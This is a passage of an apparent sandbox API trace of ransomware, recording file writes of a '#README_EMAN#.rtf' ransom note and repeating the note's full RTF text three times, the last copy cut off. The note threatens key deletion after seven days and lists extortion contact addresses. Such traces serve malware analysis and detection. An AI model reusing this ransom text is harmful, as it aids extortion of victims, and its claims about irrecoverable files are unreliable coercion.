(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0291.211] GetLastError () returned 0x2 [0291.211] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.211] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 